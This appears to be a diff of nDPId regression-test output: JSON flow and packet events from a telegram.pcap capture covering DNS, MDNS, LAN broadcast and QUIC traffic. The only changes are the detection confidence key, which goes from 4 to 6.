00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":698,"source":"telegram.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1588779628804,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"thread_ts_msec":1588779628804,"pkt":"KDc3AG3IEBMx8Tl2CABFAABr7g4AAEARCNXAqAEBwKgBTQA1wmQAVwAAFnOBgAABAAIAAAAABGRhdGkEbnRvcANvcmcAAAEAAcAMAAUAAQAAADwAFBFtYWlsLWRpZ2l0YWxvY2VhbsARwCsAAQABAAAAPAAEp2PXpA=="} -00781{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":698,"source":"telegram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779628757,"flow_last_seen":1588779628804,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1588779628804,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49764,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"dati.ntop.org","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"167.99.215.164"}} +00781{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":698,"source":"telegram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779628757,"flow_last_seen":1588779628804,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1588779628804,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49764,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"dati.ntop.org","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"167.99.215.164"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":707,"source":"telegram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779629044,"flow_last_seen":1588779629044,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1588779629044,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":5812,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":707,"source":"telegram.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1588779629044,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1588779629044,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA6m54AAEARW3bAqAFNwKgBARa0ADUAJpvbsPwBAAABAAAAAAAABXBpeGVsAndwA2NvbQAAAQAB"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"telegram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779629044,"flow_last_seen":1588779629044,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1588779629044,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":5812,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"pixel.wp.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"telegram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779629044,"flow_last_seen":1588779629044,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1588779629044,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":5812,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"pixel.wp.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":708,"source":"telegram.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1588779629045,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1588779629045,"pkt":"KDc3AG3IAICPmq69CABFAABKxbFAAEAR8VLAqAEBwKgBTQA1FrQANpjhsPyBgAABAAEAAAAABXBpeGVsAndwA2NvbQAAAQABwAwAAQABAAAAAAAEwKgBnQ=="} -00905{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":708,"source":"telegram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779629044,"flow_last_seen":1588779629045,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1588779629045,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":5812,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"pixel.wp.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"192.168.1.157"}} +00905{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":708,"source":"telegram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779629044,"flow_last_seen":1588779629045,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1588779629045,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":5812,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"pixel.wp.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"192.168.1.157"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"telegram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779629079,"flow_last_seen":1588779629079,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1588779629079,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":54595,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"telegram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1588779629079,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1588779629079,"pkt":"EBMx8Tl2KDc3AG3ICABFAABFpC4AAP8Rk9rAqAFNwKgBAdVDADUAMZzqakQBAAABAAAAAAAAAWIHX2Rucy1zZARfdWRwBG50b3ADb3JnAAAMAAE="} -00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":710,"source":"telegram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779629079,"flow_last_seen":1588779629079,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1588779629079,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":54595,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"b._dns-sd._udp.ntop.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00693{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":720,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1588779596464,"flow_last_seen":1588779631710,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":641,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1588779631710,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} +00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":710,"source":"telegram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779629079,"flow_last_seen":1588779629079,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1588779629079,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":54595,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"b._dns-sd._udp.ntop.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00693{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":720,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1588779596464,"flow_last_seen":1588779631710,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":641,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1588779631710,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} 01070{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":721,"source":"telegram.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1588779632305,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"thread_ts_msec":1588779632305,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAAHsdQUAAEARQgfAqAFN\/\/\/\/\/0RcRFwB2FvpeyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiA0MDk1NjMzNTA1MDQ3NDIyMDI0ODQ4MjA1NjAzMDgyNTQwNDYyOSwgImRpc3BsYXluYW1lIjogIiIsICJuYW1lc3BhY2VzIjogWzUzMDMzMDEyNDgsIDc4NTI2NjE3NywgMTUyNjI2MzA0NSwgMjg1MjE2MDcsIDE0ODE5MzM3LCA0NTE0NzI2NTgsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAyNzUwMzcwNTYwLCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA1ODM0NDk5NiwgNDA1NjQ2MjU5MiwgNzA1MzYyNzE4NCwgMTUyMjE3NzU4NywgMTQyMTExNDM5OSwgMTI1MjExNjQyOSwgNzA3OTYzNjY4OCwgMTc2OTY0MzA3LCAxMjU1NDA1NjYsIDEwNDc0MjgxODksIDQ3MTYxOTAwNDgsIDU0NjcxNjMwODgsIDExOTUwNDQwNzEsIDk2ODUzMjI0LCAxNzYwOTk2MywgNjQ3ODMwMzQ0MCwgNTExNzA2NjQyLCA2Mjk3OTU1MTg0LCAxNDE1NjIwMzUwXX0="} 01067{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"telegram.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1588779632305,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"thread_ts_msec":1588779632305,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAAHsvq0AAEARNbfAqAFNwKgB\/0RcRFwB2JlBeyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiA0MDk1NjMzNTA1MDQ3NDIyMDI0ODQ4MjA1NjAzMDgyNTQwNDYyOSwgImRpc3BsYXluYW1lIjogIiIsICJuYW1lc3BhY2VzIjogWzUzMDMzMDEyNDgsIDc4NTI2NjE3NywgMTUyNjI2MzA0NSwgMjg1MjE2MDcsIDE0ODE5MzM3LCA0NTE0NzI2NTgsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAyNzUwMzcwNTYwLCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA1ODM0NDk5NiwgNDA1NjQ2MjU5MiwgNzA1MzYyNzE4NCwgMTUyMjE3NzU4NywgMTQyMTExNDM5OSwgMTI1MjExNjQyOSwgNzA3OTYzNjY4OCwgMTc2OTY0MzA3LCAxMjU1NDA1NjYsIDEwNDc0MjgxODksIDQ3MTYxOTAwNDgsIDU0NjcxNjMwODgsIDExOTUwNDQwNzEsIDk2ODUzMjI0LCAxNzYwOTk2MywgNjQ3ODMwMzQ0MCwgNTExNzA2NjQyLCA2Mjk3OTU1MTg0LCAxNDE1NjIwMzUwXX0="} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":723,"source":"telegram.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1588779632315,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779632315,"pkt":"\/\/\/\/\/\/\/\/wJrQLWJ0CABFAABES\/gAAEARqizAqAE1wKgB\/+EV4RUAMNBmU3BvdFVkcDClWtsnvt2XzwABAACyJIr8D\/N2Z9WO7tpCHKgrvJhaBg=="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":725,"source":"telegram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779634762,"flow_last_seen":1588779634762,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1588779634762,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"216.58.205.68","src_port":61974,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02243{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":725,"source":"telegram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1588779634762,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1588779634762,"pkt":"EBMx8Tl2KDc3AG3ICABFAAViWJsAAEARtXvAqAFN2DrNRPIWAbsFTgTHw1EwNDZQozVJE19KlwkAAAABdLDg+WGAhzOZu62GoAEEAENITE8ZAAAAUEFEAPUBAABTTkkAAwIAAFNUSwA5AgAAVkVSAD0CAABDQ1MATQIAAE5PTkNtAgAAQUVBRHECAABVQUlEoAIAAFNDSUSwAgAAVENJRLQCAABQRE1EuAIAAFNNSEy8AgAASUNTTMACAABOT05Q4AIAAFBVQlMAAwAATUlEUwQDAABTQ0xTCAMAAEtFWFMMAwAAWExDVBQDAABDU0NUFAMAAENPUFQUAwAAQ0NSVCQDAABJUlRUKAMAAENGQ1csAwAAU0ZDVzADAAAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS13d3cuZ29vZ2xlLmNvbfji0b2UKZEBPixRS8R5FV4DZD4i7T\/6B0Z4nKaYTElCcNQLL0+vajT\/QP9tp6wIGReVi8x7NFEwNDYB6IFgkpIa6H7tgIaiFYKRXrLacjAwMDAwMDAwAuVjx2eeSNkn+AhDtSgQn3BeW8lDQzIwYmV0YSBDaHJvbWUvODMuMC40MTAzLjM0IEludGVsIE1hYyBPUyBYIDEwXzEzXzYriYKzggSKpsC6slaoCl0fAAAAAFg1MDkBAAAAHgAAAAuXQLYHE9JIhKrGV8rvXoOxMjFuf2JfKTHXlSKWC8+sAyENtsO94X6K9sux59v7JM7rsrjePubGsEAWqYL7e1xkAAAAAQAAAEMyNTXvR+qpngpSje9H6qmeClKNYDLLkqBBTd8GdwAAAADwAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":725,"source":"telegram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779634762,"flow_last_seen":1588779634762,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1588779634762,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"216.58.205.68","src_port":61974,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"beta Chrome\/83.0.4103.34 Intel Mac OS X 10_13_6"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":725,"source":"telegram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779634762,"flow_last_seen":1588779634762,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1588779634762,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"216.58.205.68","src_port":61974,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"beta Chrome\/83.0.4103.34 Intel Mac OS X 10_13_6"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":726,"source":"telegram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779634764,"flow_last_seen":1588779634764,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1588779634764,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"216.58.205.68","src_port":50822,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02243{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"telegram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1588779634764,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1588779634764,"pkt":"EBMx8Tl2KDc3AG3ICABFAAViUS0AAEARvOnAqAFN2DrNRMaGAbsFTkE+w1EwNDZQdSQ0JxgV+\/AAAAABpTtWGWoI4a2O5woGoAEEAENITE8ZAAAAUEFEAPUBAABTTkkAAwIAAFNUSwA5AgAAVkVSAD0CAABDQ1MATQIAAE5PTkNtAgAAQUVBRHECAABVQUlEoAIAAFNDSUSwAgAAVENJRLQCAABQRE1EuAIAAFNNSEy8AgAASUNTTMACAABOT05Q4AIAAFBVQlMAAwAATUlEUwQDAABTQ0xTCAMAAEtFWFMMAwAAWExDVBQDAABDU0NUFAMAAENPUFQUAwAAQ0NSVCQDAABJUlRUKAMAAENGQ1csAwAAU0ZDVzADAAAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS13d3cuZ29vZ2xlLmNvbapsx9TSQuPwh8YeJs33Nmze8URvGPZoGeJQWhFImAF+FKGJcZ5Gv+AWggZjhNIH2DzcOgKswVEwNDYB6IFgkpIa6H7tgIaiFYKRXrLacjAwMDAwMDAwTrr3TE8EhubDtCHdJzdVC1d+PPBDQzIwYmV0YSBDaHJvbWUvODMuMC40MTAzLjM0IEludGVsIE1hYyBPUyBYIDEwXzEzXzYriYKzggSKpsC6slaoCl0fAAAAAFg1MDkBAAAAHgAAAIbXL08ZJ3aJ+3OQ3+Rsvbic8DCd31+92QlBmAfJ4ZcgyovDvfnINbPNV9UIgMSv\/oTfYVDM1unv0Eg0xlJTYVZkAAAAAQAAAEMyNTXvR+qpngpSje9H6qmeClKNYDLLkqBBTd8GdwAAAADwAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":726,"source":"telegram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779634764,"flow_last_seen":1588779634764,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1588779634764,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"216.58.205.68","src_port":50822,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"beta Chrome\/83.0.4103.34 Intel Mac OS X 10_13_6"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":726,"source":"telegram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779634764,"flow_last_seen":1588779634764,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1588779634764,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"216.58.205.68","src_port":50822,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"beta Chrome\/83.0.4103.34 Intel Mac OS X 10_13_6"}} 